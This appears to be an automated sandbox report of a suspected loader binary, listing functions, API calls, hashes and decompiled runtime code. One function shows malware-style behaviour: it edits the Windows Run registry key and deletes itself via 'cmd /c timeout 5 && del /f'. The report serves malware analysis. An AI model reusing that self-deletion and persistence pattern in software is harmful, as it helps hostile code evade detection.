                                                                                                                                      • Instruction ID: b0689c525cc8a9f83ebf9c106b6eac1b24d296656f2eb9022f805e42d36d47af
                                                                                                                                      • Opcode Fuzzy Hash: 869cd617220a7378d59ae0f2ac8a98df9622efe2eafe1c9f8bbfef27ae9a243f
                                                                                                                                      • Instruction Fuzzy Hash: 27318F71600BA49FDB62AB3BD945B5A73E8AF04310F258A29F456DB2D1DF30FC408B21
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D0790, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 175COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D07CF
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003D07F1
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0811
                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 003D097A
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003D0992
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09B4
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09B9
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D09BE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: std::_$Lockit$Concurrency::cancel_current_task$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                      • String ID: false$true$}n?
                                                                                                                                      • API String ID: 3742692055-3006997818
                                                                                                                                      • Opcode ID: fd148a89c460755a75cbab5a3428c43a8e6ad126a4dde25cde92b523174b77f5
                                                                                                                                      • Instruction ID: 1375a96aa085407da3bb63943878f7c0bdae2ddd2d2fc13a1d35431faa937fb1
                                                                                                                                      • Opcode Fuzzy Hash: fd148a89c460755a75cbab5a3428c43a8e6ad126a4dde25cde92b523174b77f5
                                                                                                                                      • Instruction Fuzzy Hash: 2861D1B29003058FDB16DF64E941BAEBBF4AF04714F10856EE845AB382DB75A905CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EC59B, Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 99f73b19beaf11ab3bc7074eb61600f7645c5076831812d9bf15b00d77b52f42
                                                                                                                                      • Instruction ID: 9998746e77bbaeb5ba29de026e9bbeb57660fe358793ee52781617f49bccedcb
                                                                                                                                      • Opcode Fuzzy Hash: 99f73b19beaf11ab3bc7074eb61600f7645c5076831812d9bf15b00d77b52f42
                                                                                                                                      • Instruction Fuzzy Hash: D5C18676E40255AFDB21DBA9CC42FEE77F8AB09744F140265FA05FB2C2D670AD418B50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E9F60, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 0-3907804496
                                                                                                                                      • Opcode ID: 3b355cbfbb85fa0ce3c2929912e943a305652290256c1839dba0bcacc6fba872
                                                                                                                                      • Instruction ID: 35e5ef7ba8294d9e5fd260ad869d5dae3c64af5488282c06ab7c752f11867103
                                                                                                                                      • Opcode Fuzzy Hash: 3b355cbfbb85fa0ce3c2929912e943a305652290256c1839dba0bcacc6fba872
                                                                                                                                      • Instruction Fuzzy Hash: 34C11370E046A99FDF16DF9AC881BAD7BB4AF09310F054659E501BB3C2C731AD41CB62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F4181, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003F3E3A: CreateFileW.KERNEL32(00000000,?,?,*B?,?,?,00000000,?,003F422A,00000000,0000000C), ref: 003F3E57
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F4295
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F429C
                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 003F42A8
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F42B2
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F42BB
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 003F42DB
                                                                                                                                      • CloseHandle.KERNEL32(003EFB86), ref: 003F4428
                                                                                                                                      • GetLastError.KERNEL32 ref: 003F445A
                                                                                                                                      • __dosmaperr.LIBCMT ref: 003F4461
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                      • String ID: H
                                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                                      • Opcode ID: ab6e68a8e372c9c42d832844a3594b86e7ec977fc99ca0a723950b901d80c8c5
                                                                                                                                      • Instruction ID: 8f5b91131b021329728078ef848fc88ac8dbb014bccbe60277cd3ffc9fa6fb67
                                                                                                                                      • Opcode Fuzzy Hash: ab6e68a8e372c9c42d832844a3594b86e7ec977fc99ca0a723950b901d80c8c5
                                                                                                                                      • Instruction Fuzzy Hash: A5A12632A142589FCF1ADF68DC52BBE3BB5AB06320F190259F901AF2D1CB358D52CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D13B0, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 166registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,982F9315), ref: 003D1407
                                                                                                                                      • RegDeleteValueA.ADVAPI32(00000000,AppJSSLoader), ref: 003D141D
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 003D1425
                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 003D1438
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cmd.exe,?), ref: 003D151D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Module$DeleteExecuteFileHandleNameOpenShellValue
                                                                                                                                      • String ID: /c timeout 5 && del /f $AppJSSLoader$C:\Windows\System32\cmd.exe$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$open
                                                                                                                                      • API String ID: 3039155974-3588390337
                                                                                                                                      • Opcode ID: ff351892b08866cffe642497e63e2db0cb2f3854cb15f3b591a94c97e13cc7de
                                                                                                                                      • Instruction ID: 893a797c198278b2fdf5fd5e53e98e14fadc92bf7f4f9fc0452a32072498b005
                                                                                                                                      • Opcode Fuzzy Hash: ff351892b08866cffe642497e63e2db0cb2f3854cb15f3b591a94c97e13cc7de
                                                                                                                                      • Instruction Fuzzy Hash: 6E5108729002089FDB29DF64ED85BEDBBB5EB45304F10459DE105AB7C1CBB4AA84CF91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DD0B1, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 003DD1AE
                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 003DD1D0
                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 003DD2DF
                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 003DD3B1
                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 003DD435
                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 003DD450
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                      • Opcode ID: 3231d8375557234f690f6d2ca87fd7439f6baf62d10ae55b66d728045b8e75b9
                                                                                                                                      • Instruction ID: fda907d034dfdf217a22ceee0039a3c50d96a52691b6c0d6fe46c054e91d2c61
                                                                                                                                      • Opcode Fuzzy Hash: 3231d8375557234f690f6d2ca87fd7439f6baf62d10ae55b66d728045b8e75b9
                                                                                                                                      • Instruction Fuzzy Hash: 26B15A76C00209EFCF16DFA4E8819AEBBB9FF08310B15455BE8116B352D731EA51CB92
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E58F8, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003E590E
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      • _free.LIBCMT ref: 003E591A
                                                                                                                                      • _free.LIBCMT ref: 003E5925
                                                                                                                                      • _free.LIBCMT ref: 003E5930
                                                                                                                                      • _free.LIBCMT ref: 003E593B
                                                                                                                                      • _free.LIBCMT ref: 003E5946
                                                                                                                                      • _free.LIBCMT ref: 003E5951
                                                                                                                                      • _free.LIBCMT ref: 003E595C
                                                                                                                                      • _free.LIBCMT ref: 003E5967
                                                                                                                                      • _free.LIBCMT ref: 003E5975
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                      • Opcode ID: 0ec44a597dc37af505336f9e13a72f5e516f58f9da8a1a7ae45aea37785a1ece
                                                                                                                                      • Instruction ID: 11983b4a443f54bc94a9cb0a1d0ca22e3509714a19c7bca3b1521c050dbaaa25
                                                                                                                                      • Opcode Fuzzy Hash: 0ec44a597dc37af505336f9e13a72f5e516f58f9da8a1a7ae45aea37785a1ece
                                                                                                                                      • Instruction Fuzzy Hash: F821EA76900658EFCB42EF95C891DDD7BB9BF08344F104665F5069F261DB31DA44DB80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003F4A9A, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,003F5BAF), ref: 003F4AB3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DecodePointer
                                                                                                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                      • API String ID: 3527080286-3064271455
                                                                                                                                      • Opcode ID: ea4db97d96a50c70f5fef1cfe8b68e0ba981af7e7b6542e0b9266b652710bb4d
                                                                                                                                      • Instruction ID: 5af13bffeb1f8dc8a0d10ec39531595942eb9fcdfd7e31b327ccb2ef638b1226
                                                                                                                                      • Opcode Fuzzy Hash: ea4db97d96a50c70f5fef1cfe8b68e0ba981af7e7b6542e0b9266b652710bb4d
                                                                                                                                      • Instruction Fuzzy Hash: 6A51787490060EDBCF168FA9EA4C2BFBFB8FB44310F125045E681A76A5CBB48D25DB45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EC9BA, Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: 81cd696ce5c9c6c02c55a802a2f7dd679b166f2e8be2015c2c63c54b7f5d9dcf
                                                                                                                                      • Instruction ID: ccf1de70601b7e1af2143765b885bf16bdd0759677370192c3be00d454b52809
                                                                                                                                      • Opcode Fuzzy Hash: 81cd696ce5c9c6c02c55a802a2f7dd679b166f2e8be2015c2c63c54b7f5d9dcf
                                                                                                                                      • Instruction Fuzzy Hash: AC613B719107959FDB12DF76C842BAEB7E9AF44310F254629E845EB2C1EB70AD018B50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003A315C, Relevance: 13.7, APIs: 9, Instructions: 196COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                      			E003A315C() {
				intOrPtr* _v8;
				void** _v12;
				struct _STARTUPINFOW _v80;
				signed int _t61;
				void* _t62;
				long _t65;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				int _t72;
				signed int _t73;
				intOrPtr* _t74;
				void* _t77;
				long _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				int _t93;
				signed char _t98;
				void* _t108;
				signed int _t110;
				signed int* _t111;
				int _t112;
				void** _t115;
				void** _t120;
				signed int _t121;

				GetStartupInfoW( &_v80);
				_push(0x40);
				_t112 = 0x20;
				_push(_t112);
				_t61 = E0039A7FF();
				if(_t61 != 0) {
					_t2 = _t61 + 0x800; // 0x800
					 *0x4ee8c0 = _t61;
					 *0x4ee868 = _t112;
					__eflags = _t61 - _t2;
					if(_t61 >= _t2) {
						L5:
						__eflags = _v80.cbReserved2;
						if(_v80.cbReserved2 == 0) {
							L27:
							_t91 = 0;
							__eflags = 0;
							do {
								_t115 = (_t91 << 6) +  *0x4ee8c0;
								_t62 =  *_t115;
								__eflags = _t62 - 0xffffffff;
								if(_t62 == 0xffffffff) {
									L31:
									_t115[1] = 0x81;
									__eflags = _t91;
									if(_t91 != 0) {
										_t50 = _t91 - 1; // -1
										asm("sbb eax, eax");
										_t65 =  ~_t50 + 0xfffffff5;
										__eflags = _t65;
									} else {
										_t65 = 0xfffffff6;
									}
									_t108 = GetStdHandle(_t65);
									__eflags = _t108 - 0xffffffff;
									if(_t108 == 0xffffffff) {
										L43:
										_t58 =  &(_t115[1]);
										 *_t58 = _t115[1] | 0x00000040;
										__eflags =  *_t58;
										 *_t115 = 0xfffffffe;
										goto L44;
									} else {
										__eflags = _t108;
										if(_t108 == 0) {
											goto L43;
										}
										_t69 = GetFileType(_t108);
										__eflags = _t69;
										if(_t69 == 0) {
											goto L43;
										}
										_t70 = _t69 & 0x000000ff;
										 *_t115 = _t108;
										__eflags = _t70 - 2;
										if(_t70 != 2) {
											__eflags = _t70 - 3;
											if(_t70 == 3) {
												_t53 =  &(_t115[1]);
												 *_t53 = _t115[1] | 0x00000008;
												__eflags =  *_t53;
											}
										} else {
											_t115[1] = _t115[1] | 0x00000040;
										}
										_t55 =  &(_t115[3]); // -5171380
										_t72 = InitializeCriticalSectionAndSpinCount(_t55, 0xfa0);
										__eflags = _t72;
										if(_t72 == 0) {
											L48:
											_t68 = _t72 | 0xffffffff;
											L46:
											return _t68;
										} else {
											_t115[2] = _t115[2] + 1;
											goto L44;
										}
									}
								}
								__eflags = _t62 - 0xfffffffe;
								if(_t62 == 0xfffffffe) {
									goto L31;
								}
								_t115[1] = _t115[1] | 0x00000080;
								L44:
								_t91 = _t91 + 1;
								__eflags = _t91 - 3;
							} while (_t91 < 3);
							SetHandleCount( *0x4ee868);
							_t68 = 0;
							__eflags = 0;
							goto L46;
						}
						_t73 = _v80.lpReserved2;
						__eflags = _t73;
						if(_t73 == 0) {
							goto L27;
						}
						_t93 =  *_t73;
						_t74 = _t73 + 4;
						_v8 = _t74;
						_v12 = _t74 + _t93;
						__eflags = _t93 - 0x800;
						if(_t93 >= 0x800) {
							_t93 = 0x800;
						}
						__eflags =  *0x4ee868 - _t93; // 0x0
						if(__eflags >= 0) {
							L18:
							_t110 = 0;
							__eflags = _t93;
							if(_t93 <= 0) {
								goto L27;
							} else {
								goto L19;
							}
							do {
								L19:
								_t77 =  *_v12;
								__eflags = _t77 - 0xffffffff;
								if(_t77 == 0xffffffff) {
									goto L26;
								}
								__eflags = _t77 - 0xfffffffe;
								if(_t77 == 0xfffffffe) {
									goto L26;
								}
								_t98 =  *_v8;
								__eflags = _t98 & 0x00000001;
								if((_t98 & 0x00000001) == 0) {
									goto L26;
								}
								__eflags = _t98 & 0x00000008;
								if((_t98 & 0x00000008) != 0) {
									L24:
									_t120 = ((_t110 & 0x0000001f) << 6) + 0x4ee8c0[_t110 >> 5];
									 *_t120 =  *_v12;
									_t120[1] =  *_v8;
									_t40 =  &(_t120[3]); // 0xc
									_t72 = InitializeCriticalSectionAndSpinCount(_t40, 0xfa0);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L48;
									}
									_t41 =  &(_t120[2]);
									 *_t41 = _t120[2] + 1;
									__eflags =  *_t41;
									goto L26;
								}
								_t85 = GetFileType(_t77);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L26;
								}
								goto L24;
								L26:
								_v12 =  &(_v12[1]);
								_t110 = _t110 + 1;
								_v8 = _v8 + 1;
								__eflags = _t110 - _t93;
							} while (_t110 < _t93);
							goto L27;
						} else {
							_t111 = 0x4ee8c4;
							while(1) {
								_t86 = E0039A7FF(0x20, 0x40);
								__eflags = _t86;
								if(_t86 == 0) {
									break;
								}
								 *0x4ee868 =  *0x4ee868 + 0x20;
								_t16 = _t86 + 0x800; // 0x800
								 *_t111 = _t86;
								__eflags = _t86 - _t16;
								if(_t86 >= _t16) {
									L15:
									_t111 =  &(_t111[1]);
									__eflags =  *0x4ee868 - _t93; // 0x0
									if(__eflags < 0) {
										continue;
									}
									goto L18;
								}
								_t87 = _t86 + 5;
								__eflags = _t87;
								do {
									 *(_t87 - 5) =  *(_t87 - 5) | 0xffffffff;
									 *(_t87 + 3) =  *(_t87 + 3) & 0x00000000;
									 *(_t87 + 0x1f) =  *(_t87 + 0x1f) & 0x00000080;
									 *(_t87 + 0x33) =  *(_t87 + 0x33) & 0x00000000;
									 *((short*)(_t87 - 1)) = 0xa00;
									 *((short*)(_t87 + 0x20)) = 0xa0a;
									 *((char*)(_t87 + 0x2f)) = 0;
									_t87 = _t87 + 0x40;
									_t28 = _t87 - 5; // -74
									__eflags = _t28 -  *_t111 + 0x800;
								} while (_t28 <  *_t111 + 0x800);
								goto L15;
							}
							_t93 =  *0x4ee868; // 0x0
							goto L18;
						}
					}
					_t88 = _t61 + 5;
					__eflags = _t88;
					do {
						 *(_t88 - 5) =  *(_t88 - 5) | 0xffffffff;
						 *((short*)(_t88 - 1)) = 0xa00;
						 *((intOrPtr*)(_t88 + 3)) = 0;
						 *((short*)(_t88 + 0x1f)) = 0xa00;
						 *((char*)(_t88 + 0x21)) = 0xa;
						 *((intOrPtr*)(_t88 + 0x33)) = 0;
						 *((char*)(_t88 + 0x2f)) = 0;
						_t121 =  *0x4ee8c0; // 0x0
						_t88 = _t88 + 0x40;
						_t11 = _t88 - 5; // -74
						__eflags = _t11 - _t121 + 0x800;
					} while (_t11 < _t121 + 0x800);
					goto L5;
				}
